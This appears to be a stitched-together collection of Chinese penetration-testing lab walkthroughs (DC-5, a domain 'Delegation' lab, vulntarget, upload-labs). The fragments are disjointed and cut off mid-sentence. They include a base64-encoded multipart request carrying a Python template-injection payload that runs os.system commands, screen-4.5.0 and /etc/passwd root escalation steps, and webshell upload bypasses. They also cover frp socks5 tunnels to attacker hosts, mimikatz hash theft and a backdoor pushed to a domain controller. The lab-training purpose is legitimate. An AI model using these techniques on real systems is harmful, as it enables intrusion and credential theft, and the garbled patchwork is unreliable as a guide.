01 项目安装 先把DC-5的靶机安装到本地 下载地址是:https://www.five86.com/dc-5.html 进入页面点击here 进行下载 下载好之后,导入咱们的虚拟机 看到这个页面
= 使用中国蚁剑连接MM 使用命令查看存在权限的命令,查看权限发现screen-4.5.0特殊文件 提权 查询screen-4.5.0的利用脚本,发现存在 root@bbkali:/tmp/dc5# ----------------- ---------------------------------------- Shellcodes: No Result root@bbkali:/tmp/dc5# Type: Bourne-Again shell script, ASCII text executable, with CRLF line terminators Copied to: /tmp/dc5/ libhax.c 使用vim命令创建第二个rootshell.c,复制粘贴完内容后按下esc输入:wq保存退出 再编译 gcc -o rootshell rootshell.c 最后一个部分dc5. sh同理,但是需要注意的是下面需要转换一下格式 执行完命令后,可以看见在桌面home/dc-5文件夹有五个文件 将带有.c的文件删除,在kali中使用rm命令 再回到文件夹内可以看见 然后我们回到中国蚁剑
bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5: ⼀般打靶场这种后续都可以利⽤到。 时区: (UTC+08:00) 北京,重庆,香港特别行政区,乌鲁木齐 物理内存总量: 3,950 MB 可用的物理内存: 2,633 MB 虚拟内存: 最大值: 5,358
Delegation是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
| 2048 dc:e8:ad:80:35:81:c4:29:7e:cf:e4:70:f2:69:d9:96 (RSA) | 256 46:20:20:03:9c:97:35:f6:2d:5d (ECDSA) |_ 256 ae:90:88:f6:63:8d:dc:60:fa:ff:fc:70:12:e4:f4:1f (ED25519) MAC Address: 00:0C:29:1B:B5: we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5. X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDU3ODUzNjcwMTMzNTUyOTgzMDExNzk0MzIxNzYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0aW1lX2ludGVydmFsIgoKMjAyOS0wNS0yNiB0byAyMDI5LTA1LTI3Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ibGVhdmVfcmVxdWVzdCIKCntjbWR9Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic2lnbmF0dXJlIjsgZmlsZW5hbWU9IlVudGl0bGVkLnBuZyIKQ29udGVudC1UeXBlOiBpbWFnZS9wbmcKColQTkcKGgoAAAAKSUhEUgAAAAoAAAAKCAIAAAACUFjqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAApSURBVChTY9i +fbuAgAADAwMHB8f8+fMlJCSAbARA5gNVQFkjGzAwAADL7QTzijujCwAAAABJRU5ErkJgggotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3NgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVzZXJfaW5wdXQiCgo8cD5hc2RmPC9wPgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3Ni0t PGZvbnQgY29sb3I9IlsgWyBnZXRhdHRyKHBvdywgV29yZCgnX19nbG9iYWxzX18nKSlbJ29zJ10uc3lzdGVtKCd7Y21kfScpIGZvciBXb3JkIGluIFsgb3JnVHlwZUZ1biggJ1dvcmQnLCAoc3RyLCksIHsgJ211dGF0ZWQnOiAxLCAnc3RhcnRzd2l0aCc6IGxhbWJkYSBzZWxmLCB4OiBGYWxzZSwgJ19fZXFfXyc6IGxhbWJkYSBzZWxmLCB4OiBzZWxmLm11dGF0ZSgpIGFuZCBzZWxmLm11dGF0ZWQgPCAwIGFuZCBzdHIoc2VsZikgPT0geCwgJ211dGF0ZSc6IGxhbWJkYSBzZWxmOiB7c2V0YXR0cihzZWxmLCAnbXV0YXRlZCcsIHNlbGYubXV0YXRlZCAtIDEpfSwgJ19faGFzaF9fJzogbGFtYmRhIHNlbGY6IGhhc2goc3RyKHNlbGYpKSwgfSwgKSBdIF0gZm9yIG9yZ1R5cGVGdW4gaW4gW3R5cGUodHlwZSgxKSldXSBhbmQgJ3JlZCciPgoxPC9mb250PjwvcD4
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
启动代理 先在kali处运行server端 根据目标版本上传agent到目标机器后并执行 这边server端可以发现新的监听上线 接下来进入node在本地1080端口建立一个socks5监听 我们利用searchsploit去查找一下漏洞 并在当前目录发现个passwords 去somd5网站解密(就不一个个截图了) 得到密码后尝试用ssh去登录目标系统 提权 先查看一下系统版本。
然后使用将hash进行md5解密,得知密码:Admin@123 既然知道了密码,在win10机器上进行IPC连接,上传正向的后门到域控制器: 成功获取到域控制器的机器 如下就是所有的sessions
192.168.0.104 Linux Kernel 192.168.0.103 涉及技术 主机发现 网络扫描 强制访问 参数爆破 文件包含 PHP封装器 任意文件读取 SSH公钥登录 离线密码破解 系统权限漏洞利用 打靶开始 passwd可以进行文件写入 使用,openssl 生成一段密文 openssl passwd -1 然后替换/etc/passwd里面的x 20210925234956721039.png 提权成功,打靶结束
: 192.168.153.130 192.168.1.102 win7 > ip :192.168.153.128 win10 > ip : 192.168.153.129 0x02 打靶记录
- 192.168.20.1:9200 - TCP OPEN [+] 192.168.20.1: - 192.168.20.1:9300 - TCP OPEN 浏览器挂上socks5代理 Kibana的web服务: 9200端口是一个json的数据,这个Kibana版本好像是6.5.4的,先看web服务: 百度搜索这个Web服务还是有历史漏洞的,找一下POC: 因为msf搭建的socks5打不开 ,成功拿到root权限: https://github.com/liamg/traitor 先看一下flag: 这个漏洞打一次之后就不行了 然后再使用root权限执行后门,拿到root权限: 5. server_addr = 192.168.20.4 server_port = 7799 [http_proxy] type = tcp remote_port = 1088 plugin = socks5
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
:/s5Y1">5>wZ WIN2016$ vulntarget.com c2 3e 11 5a 0e 59 54 f0 7c 60 e0 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5 16 ad f4 ba 1c ed 5c fc f2 04 24 c8 d6 40 8f ac 87 f5 win2016 27 ba 60 3b 91 d5 fa 53 fc 5b ae 4a c8 99 42 42 40 43 8b 35 43 cf 9c bb 10 7a dd 63 72 f6 ba 6c 7a 6b 54 31 5c 58 2f 01 f7 22 10 11 1b 31 91 fa 1a 35 8d 11 e9 c1 50 6c dc f8 c5
既然看到了登录密码框,而且提示,账户名为:admin,只需要就用BurpSuite将密码爆破出来
可惜的是访问不了,因为做了域名绑定,所以需要我们在本地做个域名映射,这个和之前DC-2是一样的问题
[0] = 1008813135;erp[1] = 1129601360;erp[2] = 1159751796;erp[3] = 1835810317;erp[4] = 171731060;erp[5] openSSH] # 定义敲门的端口顺序 sequence = 7000,8000,9000 # 设置超时时间,时间太小可能会出错 这个超时时间指的是敲门端口之间的间隔时长,默认是5秒 ,可以根据实际情况,调大点 seq\_timeout = 5 command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 设置敲门成功后所执行的命令 tcpflags = syn[closeSSH] sequence = 9000,8000,7000 seq\_timeout = 5 tcpflags = syn[openHTTPS] sequence = 12345,54321,24680,13579 seq\_timeout = 5
一句话木马getshell会在Pass02[4]演示一遍,之后将不再演示1. webshell最好设置不同名,或者在每次上传成功后删除,避免出现绕过失败但测试成功的情况 Pass14~Pass21的题解见:打靶归来 可以进行getshell 0vk90 iica3 ap1cp 43413 it80m — Pass03 ~ Pass05 黑名单检测使用特殊方法绕过 【Pass03 - 使用其它后缀名绕过】 题目: fpr5k 绕过方法: 本题使用黑名单过滤,且只过滤原始的后缀,所以可以使用不在其黑名单中的后缀进行绕过,Pass04[5]和Pass05[6]的方法可以在这一题使用,也可以使用其它的后缀名进行绕过。
前言 这篇文章是零度安全2021年的首篇文章,后期将会陆续更新打靶,实战系列的文章。 在这里也感谢大家对零度安全的支持与信任。 ? 5. 寻找配置文件 找来找去,终于找到了,配置文件 sites/default/settings.php ? 5.find提权,通过find获取到root的suid,suid具有传递性,从而拿到root权限。
打靶过程 3.1 第一层 nmap端口扫描 看到80端口开放的Laravel 寻找了多个EXP之后,终于找到一个能用的:将脚本文件和phpggc这个脚本放在同一级目录下 phpgcc:https:/ ssh登录成功,获取一个root权限的账户 在/root/flag查看flag 顺便再执行一下后门文件上传到msf,方便进行下一步渗透 3.2 第二层 现第二块网 然后添加路由,设置socks5代理 ,使用代理nmap进行IP扫描 扫描到了20.100的80端口开放了 NMAP扫描只开放了80,443 在firefox设置一个socks5代理 然后使用socks代理访问到了80端口,是一个OVAS-PHP server_addr = 192.168.0.107 server_port = 7002 [plugin_socks] type = tcp remote_port = 7777 plugin = socks5 ,不能使用doc命令搜索,名字为flag/flag.txt的太多了 3.3 第三层 添加路由 执行mimikazi需要system权限,使用ps列举,然后窃取token 抓取hash 使用md5解密网站进行解密